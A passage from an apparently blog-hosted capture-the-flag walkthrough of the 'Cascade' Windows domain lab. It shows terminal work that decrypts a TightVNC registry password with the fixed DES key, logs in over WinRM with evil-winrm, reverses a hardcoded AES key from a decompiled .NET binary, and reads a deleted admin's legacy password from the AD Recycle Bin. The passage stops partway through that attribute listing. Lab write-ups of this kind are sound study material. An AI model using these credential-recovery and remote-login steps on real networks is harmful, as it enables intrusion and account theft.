"size": "5.83 KB"
},
"IT/Temp/s.smith/VNC Install.reg": {
"atime_epoch": "2020-01-28 14:27:43",
"ctime_epoch": "2020-01-28 14:27:43",
"mtime_epoch": "2020-01-28 15:00:01",
"size": "2.62 KB"
}
},jbrown@Jabaris-MacBook-Pro cascade % cat VNC\ Install.reg
??Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
jbrown@Jabaris-MacBook-Pro cascade % cat ArkAdRecycleBin.log
1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD] Validating settings...
1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD] Validating settings...
2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD] Validating settings...
8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0
jbrown@Jabaris-MacBook-Pro cascade % cat dcdiag.log
Directory Server Diagnosis
Performing initial setup:
Trying to find home server...
Home Server = CASC-DC1
* Identified AD Forest.
Done gathering initial info.
Doing initial required tests
Testing server: Default-First-Site-Name\CASC-DC1
Starting test: Connectivity
......................... CASC-DC1 passed test Connectivity
Doing primary tests
Testing server: Default-First-Site-Name\CASC-DC1
Starting test: Advertising
......................... CASC-DC1 passed test Advertising
Starting test: FrsEvent
......................... CASC-DC1 passed test FrsEvent
Starting test: DFSREvent
......................... CASC-DC1 passed test DFSREvent
Starting test: SysVolCheck
......................... CASC-DC1 passed test SysVolCheck
Starting test: KccEvent
......................... CASC-DC1 passed test KccEvent
Starting test: KnowsOfRoleHolders
......................... CASC-DC1 passed test KnowsOfRoleHolders
Starting test: MachineAccount
......................... CASC-DC1 passed test MachineAccount
Starting test: NCSecDesc
......................... CASC-DC1 passed test NCSecDesc
Starting test: NetLogons
......................... CASC-DC1 passed test NetLogons
Starting test: ObjectsReplicated
......................... CASC-DC1 passed test ObjectsReplicated
Starting test: Replications
......................... CASC-DC1 passed test Replications
Starting test: RidManager
......................... CASC-DC1 passed test RidManager
Starting test: Services
......................... CASC-DC1 passed test Services
Starting test: SystemLog
A warning event occurred. EventID: 0x8000001D
Time Generated: 01/10/2020 15:48:14
Event String:
The Key Distribution Center (KDC) cannot find a suitable certificate to use for smart card logons, or the KDC certificate could not be verified. Smart card logon may not function correctly if this problem is not resolved. To correct this problem, either verify the existing KDC certificate using certutil.exe or enroll for a new KDC certificate.
An error event occurred. EventID: 0xC00038D6
Time Generated: 01/10/2020 15:48:43
Event String:
The DFS Namespace service could not initialize cross forest trust information on this domain controller, but it will periodically retry the operation. The return code is in the record data.
A warning event occurred. EventID: 0x000003F6
Time Generated: 01/10/2020 15:48:43
Event String:
Name resolution for the name _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.cascade.local timed out after none of the configured DNS servers responded.
A warning event occurred. EventID: 0x0000000C
Time Generated: 01/10/2020 15:48:43
Event String:
Time Provider NtpClient: This machine is configured to use the domain hierarchy to determine its time source, but it is the AD PDC emulator for the domain at the root of the forest, so there is no machine above it in the domain hierarchy to use as a time source. It is recommended that you either configure a reliable time service in the root domain, or manually configure the AD PDC to synchronize with an external time source. Otherwise, this machine will function as the authoritative time source in the domain hierarchy. If an external time source is not configured or used for this computer, you may choose to disable the NtpClient.
A warning event occurred. EventID: 0x000727AA
Time Generated: 01/10/2020 15:50:52
Event String:
The WinRM service failed to create the following SPNs: WSMAN/CASC-DC1.cascade.local; WSMAN/CASC-DC1.
......................... CASC-DC1 failed test SystemLog
Starting test: VerifyReferences
......................... CASC-DC1 passed test VerifyReferences
Running partition tests on : ForestDnsZones
Starting test: CheckSDRefDom
......................... ForestDnsZones passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... ForestDnsZones passed test
CrossRefValidation
Running partition tests on : DomainDnsZones
Starting test: CheckSDRefDom
......................... DomainDnsZones passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... DomainDnsZones passed test
CrossRefValidation
Running partition tests on : Schema
Starting test: CheckSDRefDom
......................... Schema passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... Schema passed test CrossRefValidation
Running partition tests on : Configuration
Starting test: CheckSDRefDom
......................... Configuration passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... Configuration passed test CrossRefValidation
Running partition tests on : cascade
Starting test: CheckSDRefDom
......................... cascade passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... cascade passed test CrossRefValidation
Running enterprise tests on : cascade.local
Starting test: LocatorCheck
......................... cascade.local passed test LocatorCheck
Starting test: Intersite
......................... cascade.local passed test Intersite
jbrown@Jabaris-MacBook-Pro cascade %
If it looks like a password in hex format, that’s another strong indicator we’re dealing with encoding — not hashing.
Hex is just representation.
If the string only contains characters 0-9 and a-f (and the length makes sense), there’s a good chance it’s simply hex-encoded data.
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0fAfter doing a little research (with some AI help), I learned that the VNC product line uses the same hardcoded DES key across multiple versions.
Which means if we find a VNC‑encrypted password, we don’t crack it.
We decrypt it.
That hex value we found? Very likely a VNC password.
Shoutout to the researchers who documented this — makes life a lot easier.
more can be found at this github: https://github.com/frizb/PasswordDecrypts/blob/master/README.md gives simple explanation and example
jbrown@Jabaris-MacBook-Pro cascade % echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d -provider legacy -provider default | hexdump -Cv00000000 73 54 33 33 33 76 65 32 |sT333ve2|
00000008
jbrown@Jabaris-MacBook-Pro cascade %
Now that we have the password, we can attempt to log in via evil-winrm.
This time it should work.
Why?
Get Jabaribrown’s stories in your inbox
Join Medium for free to get updates from this writer.
Because Steve is a member of the Remote Management Users group, which grants WinRM access.
cn: Steve Smith
sn: Smith
givenName: Steve
distinguishedName: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109180813.0Z
whenChanged: 20200323113113.0Z
displayName: Steve Smith
uSNCreated: 16404
memberOf: CN=Audit Share,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295015
name: Steve Smith
objectGUID: 39nrOPfEAE2an/UDQy/6fQ==
Grab the user flag:
jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.42.114 -u s.smith -p sT333ve2
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\s.smith\Documents>
*Evil-WinRM* PS C:\Users\s.smith\Documents> dir
*Evil-WinRM* PS C:\Users\s.smith\Documents> cd ..
*Evil-WinRM* PS C:\Users\s.smith> dir
Directory: C:\Users\s.smith
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 3/25/2020 11:17 AM Desktop
d-r--- 1/13/2020 3:36 AM Documents
d-r--- 7/14/2009 3:34 AM Downloads
d-r--- 7/14/2009 3:34 AM Favorites
d-r--- 7/14/2009 3:34 AM Links
d-r--- 7/14/2009 3:34 AM Music
d-r--- 7/14/2009 3:34 AM Pictures
d----- 7/14/2009 3:34 AM Saved Games
d-r--- 7/14/2009 3:34 AM Videos
*Evil-WinRM* PS C:\Users\s.smith> cd Desktop
*Evil-WinRM* PS C:\Users\s.smith\Desktop> dir
Directory: C:\Users\s.smith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/2/2026 12:00 AM 34 user.txt
-a---- 2/4/2021 4:24 PM 1031 WinDirStat.lnk
*Evil-WinRM* PS C:\Users\s.smith\Desktop> type user.txt
***UserFlagFoundHere*****
*Evil-WinRM* PS C:\Users\s.smith\Desktop>
User flag secured.
Now it’s time for the admin flag.
We already have the TempAdmin credentials in our back pocket, but before jumping straight to that, we enumerate again.
Post-exploitation is still enumeration — just from the inside now.
The good thing is we already did a lot of LDAP recon earlier, so we’re not starting from scratch.
Now that we’re on the box as s.smith, we take a closer look at the environment.
And something stands out.
There’s a script that runs every time this user logs in.
cn: Steve Smith
sn: Smith
givenName: Steve
distinguishedName: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109180813.0Z
whenChanged: 20200323113113.0Z
displayName: Steve Smith
uSNCreated: 16404
memberOf: CN=Audit Share,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295015
name: Steve Smith
objectGUID: 39nrOPfEAE2an/UDQy/6fQ==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247275952778272
lastLogoff: 0
lastLogon: 132247275990842339
scriptPath: MapAuditDrive.vbs <- HERE
pwdLastSet: 132247150854857364
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFUwQAAA==
accountExpires: 9223372036854775807
logonCount: 16
sAMAccountName: s.smith
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200109180813.0Z
dSCorePropagationData: 16010101000417.0Z
lastLogonTimestamp: 132294366735115088We already saw that script earlier in the SYSVOL share, so this isn’t new — we just didn’t fully analyze it.
Now that we’re on the box, it makes sense to grab it and take a closer look.
python3 smbclient.py cascade.local/r.thompson:[email protected]
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies Type help for list of commands
# use SYSVOL
# ls
drw-rw-rw- 0 Thu Jan 9 10:31:27 2020 .
drw-rw-rw- 0 Thu Jan 9 10:31:27 2020 ..
drw-rw-rw- 0 Thu Jan 9 10:31:27 2020 cascade.local
# cd cascade.local
# ls
drw-rw-rw- 0 Thu Jan 9 10:33:07 2020 .
drw-rw-rw- 0 Thu Jan 9 10:33:07 2020 ..
drw-rw-rw- 0 Tue Mar 3 07:53:20 2026 DfsrPrivate
drw-rw-rw- 0 Thu Jan 9 14:42:40 2020 Policies
drw-rw-rw- 0 Wed Jan 15 16:50:33 2020 scripts
# cd scripts
# ls
drw-rw-rw- 0 Wed Jan 15 16:50:33 2020 .
drw-rw-rw- 0 Wed Jan 15 16:50:33 2020 ..
-rw-rw-rw- 258 Wed Jan 15 16:50:14 2020 MapAuditDrive.vbs
-rw-rw-rw- 255 Wed Jan 15 16:51:03 2020 MapDataDrive.vbs
# get MapAuditDrive.vbs
# get MapDataDrive.vbs
#
Looking at the script closely now.
'MapAuditDrive.vbs
Option Explicit
Dim oNetwork, strDriveLetter, strRemotePath
strDriveLetter = "F:"
strRemotePath = "\\CASC-DC1\Audit$"
Set oNetwork = CreateObject("WScript.Network")
oNetwork.MapNetworkDrive strDriveLetter, strRemotePath
WScript.Quit'MapDataDrive.vbs
Option Explicit
Dim oNetwork, strDriveLetter, strRemotePath
strDriveLetter = "O:"
strRemotePath = "\\CASC-DC1\Data"
Set oNetwork = CreateObject("WScript.Network")
oNetwork.MapNetworkDrive strDriveLetter, strRemotePath
WScript.Quit
We can see the script is mapping a drive to a remote Audit path.
Let’s use netexec again — this time authenticated — to see:
- What other shares are available
- What permissions we have (READ / WRITE)
- Whether Audit is accessible
- If there are any hidden or admin shares we can touch
jbrown@Jabaris-MacBook-Pro examples % nxc smb 10.129.42.114 -u s.smith -p sT333ve2 -M spider_plus
SMB 10.129.42.114 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.42.114 445 CASC-DC1 [+] cascade.local\s.smith:sT333ve2
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] STATS_FLAG: True
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] OUTPUT_FOLDER: /Users/jbrown/.nxc/modules/nxc_spider_plus
SMB 10.129.42.114 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.42.114 445 CASC-DC1 Share Permissions Remark
SMB 10.129.42.114 445 CASC-DC1 ----- ----------- ------
SMB 10.129.42.114 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.42.114 445 CASC-DC1 Audit$ READ
SMB 10.129.42.114 445 CASC-DC1 C$ Default share
SMB 10.129.42.114 445 CASC-DC1 Data READ
SMB 10.129.42.114 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.42.114 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.129.42.114 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.42.114 445 CASC-DC1 SYSVOL READ Logon server share
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [+] Saved share-file metadata to "/Users/jbrown/.nxc/modules/nxc_spider_plus/10.129.43.159.json".
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] SMB Shares: 8 (ADMIN$, Audit$, C$, Data, IPC$, NETLOGON, print$, SYSVOL)
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] SMB Readable Shares: 5 (Audit$, Data, NETLOGON, print$, SYSVOL)
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] Total folders found: 61
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] Total files found: 28
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] File size average: 122.39 KB
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] File size min: 6 B
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] File size max: 1.56 MB
jbrown@Jabaris-MacBook-Pro examples %Compared to r.thompson, we actually have read permission on the Audit share with s.smith.
r.thompson
SMB Readable Shares: 4 (Data, NETLOGON, print$, SYSVOL)vs
s.smith
SMB Readable Shares: 5 (Audit$, Data, NETLOGON, print$, SYSVOL)
Now let’s connect to the Audit drive directly and see what’s inside.
jbrown@Jabaris-MacBook-Pro examples % python3 smbclient.py cascade.local/s.smith:[email protected]
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies Type help for list of commands
# use Audit$
# ls
drw-rw-rw- 0 Wed Jan 29 13:01:26 2020 .
drw-rw-rw- 0 Wed Jan 29 13:01:26 2020 ..
-rw-rw-rw- 13312 Tue Jan 28 16:47:08 2020 CascAudit.exe
-rw-rw-rw- 12288 Wed Jan 29 13:01:26 2020 CascCrypto.dll
drw-rw-rw- 0 Tue Jan 28 16:43:18 2020 DB
-rw-rw-rw- 45 Tue Jan 28 18:29:47 2020 RunAudit.bat
-rw-rw-rw- 363520 Tue Jan 28 15:42:18 2020 System.Data.SQLite.dll
-rw-rw-rw- 186880 Tue Jan 28 15:42:18 2020 System.Data.SQLite.EF6.dll
drw-rw-rw- 0 Tue Jan 28 15:42:18 2020 x64
drw-rw-rw- 0 Tue Jan 28 15:42:18 2020 x86
# cd DB
# ls
drw-rw-rw- 0 Tue Jan 28 16:43:18 2020 .
drw-rw-rw- 0 Tue Jan 28 16:43:18 2020 ..
-rw-rw-rw- 24576 Tue Jan 28 16:43:18 2020 Audit.db
An Audit.db file — and if it’s SQLite, that’s even better for us.
SQLite databases are file-based, which means:
- No service needed
- No credentials needed
- If we can read the file, we can read the data
jbrown@Jabaris-MacBook-Pro cascade % sqlite3 Audit.db
SQLite version 3.43.2 2023-10-10 13:08:14
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite> .schema Ldap
CREATE TABLE IF NOT EXISTS "Ldap" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"uname" TEXT,
"pwd" TEXT,
"domain" TEXT
);
sqlite> SELECT * FROM Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite>so we found the pasword for the ArkSvc user looks to be base64 encoded lets see if we can decode it using the cmdline
All we have to do is decode it from the command line.
jbrown@Jabaris-MacBook-Pro cascade % echo "BQO5l5Kj9MdErXx6Q6AGOw==" | base64 -d
??????D?|zC?;% Alright — if the decoded value still looks encoded, no problem.
We pivot back to enumeration.
Now we also noticed CascAudit.exe, and it’s written in .NET.
That’s interesting.
With .NET binaries, we’re in a good position because they’re easy to decompile.
So the move is simple, open it in ILSpy and review the source code.
Press enter or click to view image in full size
{
sQLiteConnection.Open();
SQLiteCommand sQLiteCommand = new SQLiteCommand("SELECT * FROM LDAP", sQLiteConnection);
try
{
SQLiteDataReader sQLiteDataReader = sQLiteCommand.ExecuteReader();
try
{
sQLiteDataReader.Read();
text = Conversions.ToString(sQLiteDataReader["Uname"]);
text2 = Conversions.ToString(sQLiteDataReader["Domain"]);
string encryptedString = Conversions.ToString(sQLiteDataReader["Pwd"]);
try
{
password = Crypto.DecryptString(encryptedString, "c4scadek3y654321");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
Console.WriteLine("Error decrypting password: " + ex2.Message);
ProjectData.ClearProjectError();
return;
}
}
finally
{
IDisposable disposable = sQLiteDataReader as IDisposable;
if (disposable != null)
{
disposable.Dispose();
}
}
}
finally
{
((IDisposable)(object)sQLiteCommand)?.Dispose();
}
sQLiteConnection.Close();
}So of course I’m not super well‑versed in .NET, so I used a little AI help to break this down.
Looking at the code, we see:
Crypto.DecryptString(encryptedString, "c4scadek3y654321")
Which basically tells us everything.
encryptedString→ that’s the value from the DB"c4scadek3y654321"→ that’s the keyDecryptString→ that’s what turns it back into plaintext
So this isn’t just “encoded again.” It’s encrypted. And they left the key sitting right there in the source code.
Even better, the function references CascCrypto.dll, which we also saw sitting in the share.
-rw-rw-rw- 12288 Wed Jan 29 13:01:26 2020 CascCrypto.dllPress enter or click to view image in full size
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;public static string DecryptString(string EncryptedString, string Key)
{
byte[] array = Convert.FromBase64String(EncryptedString);
Aes aes = Aes.Create();
aes.KeySize = 128;
aes.BlockSize = 128;
aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
aes.Mode = CipherMode.CBC;
aes.Key = Encoding.UTF8.GetBytes(Key);
using MemoryStream stream = new MemoryStream(array);
using CryptoStream cryptoStream = new CryptoStream(stream, aes.CreateDecryptor(), CryptoStreamMode.Read);
byte[] array2 = new byte[checked(array.Length - 1 + 1)];
cryptoStream.Read(array2, 0, array2.Length);
return Encoding.UTF8.GetString(array2);
}
Again… went to AI to break it down because I’m not pretending to be a .NET crypto expert 😂
Long story short:
- It’s using AES‑128‑CBC
- The IV is hardcoded:
"1tdyjCbY1Ix49842" - The key is hardcoded:
"c4scadek3y654321" - The output is Base64 so it can sit nicely in the SQLite DB
Which means…
This is fully reversible.
They gave us:
- The encrypted password (from the DB)
- The key
- The IV
- The encryption mode
That’s the entire recipe.
So instead of guessing or cracking anything, we just replicate the logic.
Since we know it’s AES‑128‑CBC, we can write a quick Python script, import pyaes, plug in the key and IV, decode the Base64 string, and decrypt it properly.
Press enter or click to view image in full size
Now we have the ArkSvc password.
w3lc0meFr31ndNow let’s try connecting with evil-winrm using the ArkSvc credentials.
jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.42.114 -u arksvc -p w3lc0meFr31nd
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\arksvc\Documents>
Now instead of blindly poking around, let’s go back to what we already gathered earlier.
We did a lot of LDAP enumeration before we ever had a shell.
cn: ArkSvc
distinguishedName: CN=ArkSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109161820.0Z
whenChanged: 20200323113833.0Z
displayName: ArkSvc
uSNCreated: 12799
memberOf: CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=AD Recycle Bin,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295021
name: ArkSvc
objectGUID: ELXj5FhFXUmr2tAqpnaTNA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 132248055409887841
pwdLastSet: 132230603002172876
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFUgQAAA==
accountExpires: 9223372036854775807
logonCount: 13
sAMAccountName: arksvc
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163635.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 16010101000417.0Z
lastLogonTimestamp: 132294371134322815This account is a member of the AD Recycle Bin.
The Active Directory Recycle Bin allows recovery of accidentally deleted AD objects like users, groups, and computers without restoring from backup. It preserves full attributes and group memberships for a default period of 180 days.
On a side note, while playing around with the Audit.db database, I came across the schema and noticed commands that deleted a few users — including TempAdmin.
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE IF NOT EXISTS "Ldap" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"uname" TEXT,
"pwd" TEXT,
"domain" TEXT
);
INSERT INTO Ldap VALUES(1,'ArkSvc','BQO5l5Kj9MdErXx6Q6AGOw==','cascade.local');
CREATE TABLE IF NOT EXISTS "Misc" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"Ext1" TEXT,
"Ext2" TEXT
);
CREATE TABLE IF NOT EXISTS "DeletedUserAudit" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"Username" TEXT,
"Name" TEXT,
"DistinguishedName" TEXT
);
INSERT INTO DeletedUserAudit VALUES(6,'test',replace('Test\nDEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d','\n',char(10)),'CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local');
INSERT INTO DeletedUserAudit VALUES(7,'deleted',replace('deleted guy\nDEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef','\n',char(10)),'CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local');
INSERT INTO DeletedUserAudit VALUES(9,'TempAdmin',replace('TempAdmin\nDEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a','\n',char(10)),'CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local');
DELETE FROM sqlite_sequence;
INSERT INTO sqlite_sequence VALUES('Ldap',2);
INSERT INTO sqlite_sequence VALUES('DeletedUserAudit',10);
COMMIT;TempAdmin is in the Recycle Bin:
*Evil-WinRM* PS C:\Users\arksvc\Desktop> Get-ADObject -ldapfilter "(&(objectclass=user)(isDeleted=TRUE))" -IncludeDeletedObjectsDeleted : True
DistinguishedName : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
Name : CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
ObjectClass : computer
ObjectGUID : 6d97daa4-2e82-4946-a11e-f91fa18bfabe
Deleted : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
n the output, we see something that looks very familiar.
The cascadeLegacyPwd custom attribute.
That’s the same attribute we saw earlier leaking credentials.
Which means even though TempAdmin was deleted, its attributes were preserved in the Recycle Bin — including that custom password field.
Get-ADObject -ldapfilter "(&(objectclass=user)(isDeleted=TRUE))" -IncludeDeletedObjects -Properties *cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVzaccountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
